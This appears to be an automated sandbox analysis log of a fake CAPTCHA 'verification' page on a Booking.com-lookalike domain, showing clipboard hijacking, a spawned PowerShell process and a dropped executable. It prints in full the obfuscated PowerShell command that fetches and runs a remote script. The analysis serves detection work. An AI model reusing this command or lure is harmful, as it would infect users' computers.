              Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025
              Source: Chrome DOM: 3.5OCR Text: Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privygy - Terms Verification Steps Press Windows Button C' 1 2 Press CTRL + V 3. Press Enter
              Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! c I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Windows Button 'C" + R 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025
              HTML page adds supicious text to clipboard
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access -
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access -
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeJump to dropped file
              Source: C:\Windows\System32\AtBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\Narrator.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\Narrator.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3019
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6815
              Source: C:\Windows\System32\svchost.exe TID: 4736Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 3019 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 6815 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\Narrator.exe TID: 6500Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\AtBroker.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -c "$cmd='';$b='axdyigh0dhbzoi8vyxbpb2vrcy5py3uvzml4ic1vc2vcyxnpy1bhcnnpbmd8awv4';$cmd=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($b));iex $cmd;$null=' confirm access - 7891045'
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
